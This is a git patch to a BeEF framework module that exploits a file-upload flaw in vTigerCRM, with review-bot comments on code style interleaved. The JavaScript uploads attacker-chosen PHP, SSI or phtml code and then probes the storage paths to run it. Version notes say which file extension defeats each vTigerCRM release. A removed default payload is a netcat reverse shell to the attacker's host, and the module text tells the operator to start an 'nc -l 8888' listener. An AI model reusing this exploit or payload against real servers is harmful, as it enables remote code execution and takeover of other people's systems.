From 12e93cd188cc007884db88d4d342380ad52a56f6 Mon Sep 17 00:00:00 2001
From: "yori.kvitchko"
Date: Thu, 30 Jun 2011 20:19:29 +0000
Subject: [PATCH] Fixed to work with latest version of beef. Added random file naming and ability to change extension. Also added notes for new version of vTigerCRM.

git-svn-id: https://beef.googlecode.com/svn/trunk@1043 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../vtiger_crm_upload_exploit/command.js | 37 ++++++++++++++-----
 .../vtiger_crm_upload_exploit/config.yaml | 2 +-
 .../vtiger_crm_upload_exploit/module.rb | 8 ++--
 3 files changed, 33 insertions(+), 14 deletions(-)

diff --git a/modules/network/vtiger_crm_upload_exploit/command.js b/modules/network/vtiger_crm_upload_exploit/command.js
index 236865722..3cad71a87 100644
--- a/modules/network/vtiger_crm_upload_exploit/command.js
+++ b/modules/network/vtiger_crm_upload_exploit/command.js
@@ -26,6 +40,22 @@ beef.execute(function() {
 baseurl = "<%= @vtiger_url %>";
+ function get_ajax() {
+ var http_request;
+ // use the ActiveX control for IE5.x and IE6
+ try {
+ http_request = new ActiveXObject("MSXML2.XMLHTTP");
+ } catch (othermicrosoft){
+ try {
+ http_request = new ActiveXObject("Microsoft.XMLHTTP");
+ } catch (native) {
+ // If IE7, Mozilla, Safari, etc: Use native object
+ http_request = new XMLHttpRequest();
+ }
+ }
+ return http_request;
+ }
+
 function do_upload(){
 setTimeout(function() {ajax_upload()}, 1000);
 }
@@ -40,8 +56,11 @@ beef.execute(function() {
 function ajax_upload(){
 var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
- http_request = false;
- http_request = beef.net.get_ajax();
+ var http_request;
+
+ http_request = false;
+ http_request = get_ajax();
+
 if (!http_request) {
 // fail silently!
 return false;
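Review bot: The inner catch parameter of the new get_ajax is named `native`, which is a future-reserved word in ECMAScript 3, so older engines may refuse to parse the whole function; `} catch (nativeErr) {` avoids the clash. Both caught exceptions are otherwise unused, which is acceptable for feature detection, but a one-line comment above the outer try stating that the ActiveX probes are expected to throw outside IE would make the nested try/catch read as intentional rather than accidental. The function also appears to duplicate what the removed `beef.net.get_ajax()` call provided; if that helper still exists in the current framework, reusing it keeps the module in step with the core library — I cannot confirm that from the hunk.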
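Review bot: In ajax_upload the new `var http_request;` is followed by `http_request = false;` and then immediately by `http_request = get_ajax();`, so the `false` assignment is dead and the three added statements collapse to `var http_request = get_ajax();`. The declaration also appears to turn what the removed lines wrote as an undeclared (implicit global) variable into a function-local one; that is the substantive part of this hunk and deserves a why-comment, e.g. `// declared locally so the handle no longer leaks into the enclosing scope`. ajax_upload's body continues past the end of the hunk.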
@@ -77,18 +96,16 @@ beef.execute(function() { + '\r\n' + boundary + '\r\n' - + 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\r\n' + + 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n' + 'Content-Type: application/x-httpd-php' + '\r\n' + '\r\n' - + '<\?php' + '\r\n' + '<%= @vtiger_php %>' + '\r\n' - + '\?>' + '\r\n' + '\r\n' + boundary + '\r\n' + 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n' + '\r\n' - + 'vtiger-fun.PHP' + + '<%= @mal_filename %>.<%= @mal_ext %>' + '\r\n' + boundary + '\r\n' @@ -137,14 +154,14 @@ beef.execute(function() { } else if (uploadstate == 3) { //We got a 200, so hopefully the file was uploaded //be_graceful(); - do_callfile(0,1000); + do_callfile(0, 1000); } },<%= @upload_timeout %>); return; } - function do_callfile(start,count){ + function do_callfile(start, count){ if (document.getElementById('vtigerimg') == null) { return false; } @@ -152,13 +169,13 @@ beef.execute(function() { for (i=start;i<=start+count;i++) { var http_request = false; - http_request = beef.net.get_ajax(); + http_request = get_ajax(); if (!http_request) { // fail silently! return false; } - var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_vtiger-fun.PHP"; + var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>"; var requestbody = "birds of a feather flock together"; http_request.open('POST', findurl, false); diff --git a/modules/network/vtiger_crm_upload_exploit/config.yaml b/modules/network/vtiger_crm_upload_exploit/config.yaml index 5d1d01a51..4dbe58bc9 100644 --- a/modules/network/vtiger_crm_upload_exploit/config.yaml +++ b/modules/network/vtiger_crm_upload_exploit/config.yaml 
@@ -5,6 +5,6 @@ beef: category: "Network" name: "VTiger CRM Upload Exploit" description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888." - authors: ["wade", "bm", "pipes", "xntrik"] + authors: ["wade", "bm", "pipes", "xntrik", "yorikv"] target: working: ["ALL"] diff --git a/modules/network/vtiger_crm_upload_exploit/module.rb b/modules/network/vtiger_crm_upload_exploit/module.rb index 5dc7aa7e0..b61ca5902 100644 --- a/modules/network/vtiger_crm_upload_exploit/module.rb +++ b/modules/network/vtiger_crm_upload_exploit/module.rb @@ -15,14 +15,16 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command super({ 'Name' => 'VTiger CRM Upload Exploit', - 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888', + 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888.

vTigerCRM 5.0.4: Use extension "PHP" and php code.
vTigerCRM 5.2.0: Use extension "phtml" and php code.
vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.', 'Category' => 'Network', - 'Author' => ['wade', 'bm', 'pipes', 'xntrik'], + 'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'], 'Data' => [ {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'}, {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'}, - {'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'}, + {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'}, + {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'}, + {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'','type'=>'textarea','width'=>'400px','height'=>'100px'}, {'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'} ], 'File' => __FILE__